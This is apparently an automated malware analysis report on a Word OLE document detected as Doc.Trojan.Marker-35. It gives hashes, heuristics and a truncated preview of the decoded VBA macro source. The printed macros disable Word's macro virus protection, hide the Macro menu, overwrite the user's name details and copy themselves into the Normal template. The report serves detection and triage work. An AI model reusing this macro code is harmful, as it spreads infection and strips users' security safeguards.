Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 053447e7a9259a5b…

MALICIOUS

Office (OLE)

73.0 KB Created: 2001-12-07 10:03:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 11010eec7c41778b6f955f188044dc58 SHA-1: 664936921b14249cce0aa8a8a1a5c504464f9a33 SHA-256: 053447e7a9259a5b9c40d570d39c90f98b9585807554d74bf8e2436d5f0dbe7b
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is designed to disable macro virus protection and remove the 'Macro' option from the Tools menu. This action aims to prevent the user from being alerted to or disabling malicious macros, thereby facilitating further execution. The embedded Office document and OLE slack anomalies suggest a packed or obfuscated payload.

Heuristics 6

  • ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-35
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 28,953 bytes but its declared streams total only 0 bytes — 28,953 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43339 bytes
SHA-256: 522c9d9899d655cbfea6a216ff721fa024203e9ac642998f2f527060ad3974eb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 'Son, Be a Good Boy !
Const Marker = "<- this is a marker! by fs080298"
Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 1 Then
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 0
        CommandBars("Tools").Controls("Macro").Delete
    Else
        CommandBars("Tools").Controls("Macro").Delete
    End If
    Options.VirusProtection = False
    If Month(Now) = 1 And Day(Now) < 10 Then Message$ = "HAPPY NEW YEAR " & Year(Now) & " ! From : «(¤¿¤)» Me !"
        If Day(Now) = ((64 / 8) - 2 + 10 - (6 + 2)) And Month(Now) = ((30 / 6) + (4 / 2) + 4 - 5) Then Message$ = "Today Is My Birthday ! Thank's For Your Greeting..."
            If Day(Now) = ((25 / 5) - 2 + 10 + 14) And Month(Now) = (2 ^ 5) - 30 + 5 Then Message$ = "Happy Birthday Honey, I Love U So Much..."
                If Day(Now) = (3 ^ 6) - 700 + (2 ^ 3) - 22 And Month(Now) = (5 ^ 3) - 120 + 7 Then Message$ = "Happy Birthday, Son ! Be a Good Boy..."
                    If Message$ <> "" Then MsgBox Message$, vbInformation, "From : <(¤¿¤)>"
    Message$ = ""
    Document_Close
End Sub
Private Sub Document_Close()
    Dim nmod As Object
    Dim isd As String
    Dim DS, NTS, DI, NTI As Boolean
    Dim EmailMe, Users, LogData, LogFile As String
    On Error Resume Next
    If Right(Marker, 8) <> Chr(102) + Chr(115) + Chr(48) + Chr(56) + Chr(48) + Chr(50) + Chr(57) + Chr(56) Then GoTo Finish
    AddIns.Unload True
    Application.UserName = "fs080298"
    Application.UserInitials = "FS2000"
    Application.UserAddress = "fs080298@yeayea.com"
    Application.EnableCancelKey = wdCancelDisabled
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(121, 1), 33, 8) <> Chr$(70) + Chr$(83) + Chr$(48) + Chr$(56) + Chr$(48) + Chr$(50) + Chr$(57) + Chr$(56) Then GoTo Finish
    GoSub Sisipin
    If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
    "LogData in") = False) Then GoSub LoggingIn
    GoSub EmailMePlease
    GoTo Finish
    
Sisipin:
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> Chr(32) + Chr$(39) + Chr$(83) + Chr$(111) + Chr$(110) + Chr$(44) + Chr$(32) + Chr$(66) + Chr$(101) + Chr$(32) + Chr$(97) + Chr$(32) + Chr$(71) + Chr$(111) + Chr$(111) + Chr$(100) + Chr$(32) + Chr$(66) + Chr$(111) + Chr$(121) + Chr$(32) + Chr$(33) Then Return
    DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(95, 1), 119, 20) <> Chr$(32) + Chr$(169) + Chr$(32) + Chr$(72) + Chr$(97) + Chr$(118) + Chr$(101) + Chr$(32) + Chr$(97) + Chr$(32) + Chr$(78) + Chr$(105) + Chr$(99) + Chr$(101) + Chr$(32) + Chr$(68) + Chr$(97) + Chr$(121) + Chr$(32) + Chr$(33) Then Return
    If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
        If DI Then
            NTS = NormalTemplate.Saved
            EmailMe = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
        For i = 1 To Len(Application.UserAddress)
            If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
                If (Mid(Application.UserAddress
... (truncated)
embedded_office_off0000b2e7.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0xB2E7 28953 bytes
SHA-256: 65abc523d111bee451736b35d9899ba6af8003754342e72eb2f54a1b9ec7fc7d